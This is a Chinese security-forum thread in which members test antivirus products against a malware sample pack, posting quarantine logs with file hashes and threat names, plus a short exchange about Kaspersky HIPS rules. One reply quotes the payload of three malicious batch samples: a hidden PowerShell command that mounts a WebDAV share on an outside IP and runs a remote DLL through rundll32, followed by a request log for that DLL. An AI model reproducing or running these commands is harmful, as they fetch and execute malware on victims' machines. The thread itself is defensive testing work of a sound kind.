【开放测试】卡饭病毒样本包 20240715 第145期

终结者T90

瑞星v17 26x

nikonikoni

蜘蛛20x（可能有时间的原因

1. 2024/7/15 22:14 扫描仪 侦测到威胁 对象： 0280cde4a65664a05361129dc1cfa10bc17b3fa9567103ce6eb9d07b06f8f160.exe 威胁： Trojan.AutoIt.1410 操作： Moved to quarantine 路径： D:\v\0280cde4a65664a05361129dc1cfa10bc17b3fa9567103ce6eb9d07b06f8f160.exe
   
2. 2024/7/15 22:14 扫描仪 侦测到威胁 对象： 0178b79bd084c2597b2de4e62e61a88bb8359e4fcac2fe672bb887e0e52e5dbd.exe 威胁： Trojan.Packed2.47275 操作： Moved to quarantine 路径： D:\v\0178b79bd084c2597b2de4e62e61a88bb8359e4fcac2fe672bb887e0e52e5dbd.exe
   
3. 2024/7/15 22:14 扫描仪 侦测到威胁 对象： 4e0fdb84649ad15a0722789512aaef15c7bfbc4cab82b2a7b0ea52ac9594bb95.exe 威胁： Trojan.Siggen29.1867 操作： Moved to quarantine 路径： D:\v\4e0fdb84649ad15a0722789512aaef15c7bfbc4cab82b2a7b0ea52ac9594bb95.exe
   
4. 2024/7/15 22:14 扫描仪 侦测到威胁 对象： 97d29ffc3556069c807b5c0ae2e2b109ae329feafc912d64f8b7f437bea47d84.exe 威胁： Trojan.Packed2.46276 操作： Moved to quarantine 路径： D:\v\97d29ffc3556069c807b5c0ae2e2b109ae329feafc912d64f8b7f437bea47d84.exe
   
5. 2024/7/15 22:14 扫描仪 侦测到威胁 对象： 2ef0f582367a7674aef245acb06977bf646419f1f8d05c7fb07881a6102f982e.exe 威胁： Trojan.PWS.Stealer.37437 操作： Moved to quarantine 路径： D:\v\2ef0f582367a7674aef245acb06977bf646419f1f8d05c7fb07881a6102f982e.exe
   
6. 2024/7/15 22:14 扫描仪 侦测到威胁 对象： 3a72ecec34a29f53a1d73677a0e6f4c2e19087a32f1808f8f4ff643f62128d8a.exe 威胁： BackDoor.XWormNET.3 操作： Moved to quarantine 路径： D:\v\3a72ecec34a29f53a1d73677a0e6f4c2e19087a32f1808f8f4ff643f62128d8a.exe
   
7. 2024/7/15 22:14 扫描仪 侦测到威胁 对象： 3bfcb4f798ba63a1d18887cb67c90e083d5561a58136a892bd9944528c707671.exe 威胁： BackDoor.AgentTeslaNET.29 操作： Moved to quarantine 路径： D:\v\3bfcb4f798ba63a1d18887cb67c90e083d5561a58136a892bd9944528c707671.exe
   
8. 2024/7/15 22:14 扫描仪 侦测到威胁 对象： f28599b06560617bccdfb56acc841f3e642ff51b9956632fcc4204f026711e23.exe 威胁： Trojan.Encoder.39183 操作： Moved to quarantine 路径： D:\v\f28599b06560617bccdfb56acc841f3e642ff51b9956632fcc4204f026711e23.exe
   
9. 2024/7/15 22:14 扫描仪 侦测到威胁 对象： 0fb86a8ba8fdf57990c283080a671c1320cbcdfd0e8b5f5a250d9c38a6fce305.exe 威胁： Trojan.Encoder.36011 操作： Moved to quarantine 路径： D:\v\0fb86a8ba8fdf57990c283080a671c1320cbcdfd0e8b5f5a250d9c38a6fce305.exe
   
10. 2024/7/15 22:14 扫描仪 侦测到威胁 对象： 2c2e949171d86da9b5c58901de2e4a99c4fe86fe92c47556f53b833ce77c503c.exe 威胁： Trojan.PWS.Stealer.37437 操作： Moved to quarantine 路径： D:\v\2c2e949171d86da9b5c58901de2e4a99c4fe86fe92c47556f53b833ce77c503c.exe
    
11. 2024/7/15 22:14 扫描仪 侦测到威胁 对象： bb29aeb6ceecc37829b40e36f91a4620d7e0aae16b1ceea70bb70135e11172bd.exe 威胁： BackDoor.AgentTeslaNET.29 操作： Moved to quarantine 路径： D:\v\bb29aeb6ceecc37829b40e36f91a4620d7e0aae16b1ceea70bb70135e11172bd.exe
    
12. 2024/7/15 22:14 扫描仪 侦测到威胁 对象： d58780d1d574bfe77c6f9cfad1cf4b51522231b2699081befd5bbd15f7309aa0.exe 威胁： Trojan.PackedNET.2976 操作： Moved to quarantine 路径： D:\v\d58780d1d574bfe77c6f9cfad1cf4b51522231b2699081befd5bbd15f7309aa0.exe
    
13. 2024/7/15 22:14 扫描仪 侦测到威胁 对象： e886016e48bf0e3cd100d627678f345743509fd5f57f3c9b182f2833352bd451.exe 威胁： Trojan.PWS.Stealer.37437 操作： Moved to quarantine 路径： D:\v\e886016e48bf0e3cd100d627678f345743509fd5f57f3c9b182f2833352bd451.exe
    
14. 2024/7/15 22:14 扫描仪 侦测到威胁 对象： 68292f388207f8ec69774dbad429e67420881ce46ecfad55f23182ec3a8893e4.exe 威胁： Trojan.PWS.Stealer.37437 操作： Moved to quarantine 路径： D:\v\68292f388207f8ec69774dbad429e67420881ce46ecfad55f23182ec3a8893e4.exe
    
15. 2024/7/15 22:14 扫描仪 侦测到威胁 对象： 5297372fe85eea3ecc0d271b5567f2c7ee75bd3a04e745debddb04c9b05dae33.exe 威胁： Trojan.Packed2.47275 操作： Moved to quarantine 路径： D:\v\5297372fe85eea3ecc0d271b5567f2c7ee75bd3a04e745debddb04c9b05dae33.exe
    
16. 2024/7/15 22:14 扫描仪 侦测到威胁 对象： 4103411f7bb66a033f9f5ce35839ba08b2a27d169e188a911185790f3b78bbf5.exe 威胁： Trojan.PWS.Stealer.37437 操作： Moved to quarantine 路径： D:\v\4103411f7bb66a033f9f5ce35839ba08b2a27d169e188a911185790f3b78bbf5.exe
    
17. 2024/7/15 22:14 扫描仪 侦测到威胁 对象： a306cc84c907d6d57af300d1181128b24ca03e90c38ca7df7e84d35e80a63e03.exe 威胁： Trojan.Siggen29.1867 操作： Moved to quarantine 路径： D:\v\a306cc84c907d6d57af300d1181128b24ca03e90c38ca7df7e84d35e80a63e03.exe
    
18. 2024/7/15 22:14 扫描仪 侦测到威胁 对象： 7021c9cba6c224272f01d04450c6c31c93857a21feacfa4295a878a4d7b04378.exe 威胁： Trojan.Siggen9.56514 操作： Moved to quarantine 路径： D:\v\7021c9cba6c224272f01d04450c6c31c93857a21feacfa4295a878a4d7b04378.exe
    
19. 2024/7/15 22:14 扫描仪 侦测到威胁 对象： 39884fc02ed9a51ffcc9b298916be79307f15f1518b6ae2021dd07af0aeecb82.exe 威胁： Trojan.DownLoader5.59917 操作： Moved to quarantine 路径： D:\v\39884fc02ed9a51ffcc9b298916be79307f15f1518b6ae2021dd07af0aeecb82.exe
    
20. 2024/7/15 22:14 扫描仪 侦测到威胁 对象： 752f5cc5a7b0f986286d09e8288c0958bc1b798477ca0d09dc2658c7ab109060.exe 威胁： Trojan.PWS.Siggen3.37783 操作： Moved to quarantine 路径： D:\v\752f5cc5a7b0f986286d09e8288c0958bc1b798477ca0d09dc2658c7ab109060.exe
    

复制代码

hipoxiaxxx

娱乐测试
CCAV 扫描 KILL 3X

GreatMOLA

Deep Instinct
扫描 29x

Action	Threat Type	Details
Prevented	Malware - Virus	C:\Users\User1211\Desktop\32x  (2024-07-15)\1\de19e0163af15585...b379d00edd0.exe
Prevented	Malware - Ransomware	C:\Users\User1211\Desktop\32x  (2024-07-15)\1\f28599b06560617bc...cc4204f026711e23.exe
Prevented	Malware - Spyware	C:\Users\User1211\Desktop\32x  (2024-07-15)\1\e886016e48bf0e3cd10...9b182f2833352bd451.exe
Prevented	Malware - Spyware	C:\Users\User1211\Desktop\32x  (2024-07-15)\1\d58780d1d574bfe77c6f9...699081befd5bbd15f7309aa0.exe
Prevented	PUA - Generic PUA	C:\Users\User1211\Desktop\32x  (2024-07-15)\1\c9736cdc4ade9f...58e532b7905c310bf97.exe
Prevented	Malware - Trojan	C:\Users\User1211\Desktop\32x  (2024-07-15)\1\bb29aeb6ceecc37829b4...aae16b1ceea70bb70135e11172bd.exe
Prevented	PUA - Gaming	C:\Users\User1211\Desktop\32x  (2024-07-15)\1\b13f23643fddce3f...c81d698994c140bf6290c2d6.exe
Prevented	Malware - Ransomware	C:\Users\User1211\Desktop\32x  (2024-07-15)\1\ae1a168ff481173d180...212d0c083a474.exe
Prevented	Malware - Backdoor	C:\Users\User1211\Desktop\32x  (2024-07-15)\1\a306cc84c907d6d57af30...e84d35e80a63e03.exe
Prevented	Malware - Ransomware	C:\Users\User1211\Desktop\32x  (2024-07-15)\1\97d29ffc3556069c...8b7f437bea47d84.exe
Prevented	Malware - Spyware	C:\Users\User1211\Desktop\32x  (2024-07-15)\1\7c7cded8d1c078488185...df0e40b9856a0c.exe
Prevented	Malware - Backdoor	C:\Users\User1211\Desktop\32x  (2024-07-15)\1\752f5cc5a7b0f986286d09e8...dc2658c7ab109060.exe
Prevented	Malware - Backdoor	C:\Users\User1211\Desktop\32x  (2024-07-15)\1\7021c9cba6c224272f...295a878a4d7b04378.exe
Prevented	Malware - Ransomware	C:\Users\User1211\Desktop\32x  (2024-07-15)\1\6da4696b804777582ae58...cf3374ee291e674e5.exe
Prevented	Malware - Trojan	C:\Users\User1211\Desktop\32x  (2024-07-15)\1\0178b79bd084c2597b2de4e62e...fe672bb887e0e52e5dbd.exe
Prevented	Malware - Spyware	C:\Users\User1211\Desktop\32x  (2024-07-15)\1\68292f388207f8ec69774dbad42...5f23182ec3a8893e4.exe
Prevented	Malware - Spyware	C:\Users\User1211\Desktop\32x  (2024-07-15)\1\5297372fe85eea3ecc0d271b5567f...db04c9b05dae33.exe
Prevented	Malware - Trojan	C:\Users\User1211\Desktop\32x  (2024-07-15)\1\4e0fdb84649ad15a0722789512aaef...b0ea52ac9594bb95.exe
Prevented	Malware - Spyware	C:\Users\User1211\Desktop\32x  (2024-07-15)\1\4103411f7bb66a033f9f5ce35839ba08b2...185790f3b78bbf5.exe
Prevented	Malware - Spyware	C:\Users\User1211\Desktop\32x  (2024-07-15)\1\3bfcb4f798ba63a1d18887cb67c90e083d5...944528c707671.exe
Prevented	Malware - Trojan	C:\Users\User1211\Desktop\32x  (2024-07-15)\1\3a72ecec34a29f53a1d73677a0e6f4c2e1...43f62128d8a.exe
Prevented	Malware - Spyware	C:\Users\User1211\Desktop\32x  (2024-07-15)\1\39884fc02ed9a51ffcc9b298916be7930...1dd07af0aeecb82.exe
Prevented	Malware - Spyware	C:\Users\User1211\Desktop\32x  (2024-07-15)\1\2ef0f582367a7674ae...881a6102f982e.exe
Prevented	Malware - Spyware	C:\Users\User1211\Desktop\32x  (2024-07-15)\1\2c2e949171d86da9b5c58901...53b833ce77c503c.exe
Prevented	Malware - Spyware	C:\Users\User1211\Desktop\32x  (2024-07-15)\1\25898c73a877d87ba289bb4ab958...86befdbf9aa938f.exe
Prevented	Malware - Ransomware	C:\Users\User1211\Desktop\32x  (2024-07-15)\1\0fb86a8ba8fdf57990c283080a671c...d9c38a6fce305.exe
Prevented	PUA - Generic PUA	C:\Users\User1211\Desktop\32x  (2024-07-15)\1\0e4fc438decc9723b89...d790b2d5ce96e94accd791.exe
Prevented	Malware - Dropper	C:\Users\User1211\Desktop\32x  (2024-07-15)\1\08b7620610fc30c54e...224c285283e1612c254ef65.exe
Prevented	Malware - Dropper	C:\Users\User1211\Desktop\32x  (2024-07-15)\1\0280cde4a65664a053611...eb9d07b06f8f160.exe

执行

b2a1d168dc4234e687d0969b6a1901ac7e69c0d4bb72a1a4c76ba67fa6a14f9d.bat

miss

1. powershell.exe -windowstyle hidden net use \\45.9.74.32@8888\davwwwroot\ ; rundll32 \\45.9.74.32@8888\davwwwroot\2592.dll,entry

复制代码

c8e5a24a6d2fa68d7976457a19576b381e6211202500af5280b0f3b256446bf5.bat

miss

1. powershell.exe  -windowstyle hidden net use \\45.9.74.32@8888\davwwwroot\ ; rundll32 \\45.9.74.32@8888\davwwwroot\426.dll,entry

复制代码

f0f496eccc61594c53ded581b6683a77072f607ab018ec0a770a0aa7c7f45ff4.bat
miss

1. powershell.exe -windowstyle hidden net use \\45.9.74.32@8888\davwwwroot\ ; rundll32 \\45.9.74.32@8888\davwwwroot\3435.dll,entry

复制代码

1. //请求测试
   
2. 
   
3. GET http://45.9.74.32:8888/davwwwroot/3435.dll
   
4. Status: 500 Internal Server Error
   
5. Version: HTTP/1.1
   
6. Transferred: 268 B (22 B size)
   
7. Request Priority: Highest
   
8. DNS Resolution: System
   

复制代码

QVM360

dght432 发表于 2024-7-15 19:08
卡巴双击两个被我建立的hips规则阻止，去除hips规则后没反应

kis可以自己建立hips规则吗

断簪

QVM360 发表于 2024-7-15 22:28
kis可以自己建立hips规则吗

有应用程序控制的版本都可以

dght432

QVM360 发表于 2024-7-15 22:28
kis可以自己建立hips规则吗

可以啊

QVM360

断簪 发表于 2024-7-15 22:33
有应用程序控制的版本都可以

没找到自己创建规则的入口

1073328164

断簪 发表于 2024-7-15 22:33
有应用程序控制的版本都可以

看了下21.17只有入侵防御，里面的设置跟教程有区别，被卡巴简化了？

QVM360

dght432 发表于 2024-7-15 22:34
可以啊

我想禁止我的下载目录下的所有文件的运行，我经常把病毒放那里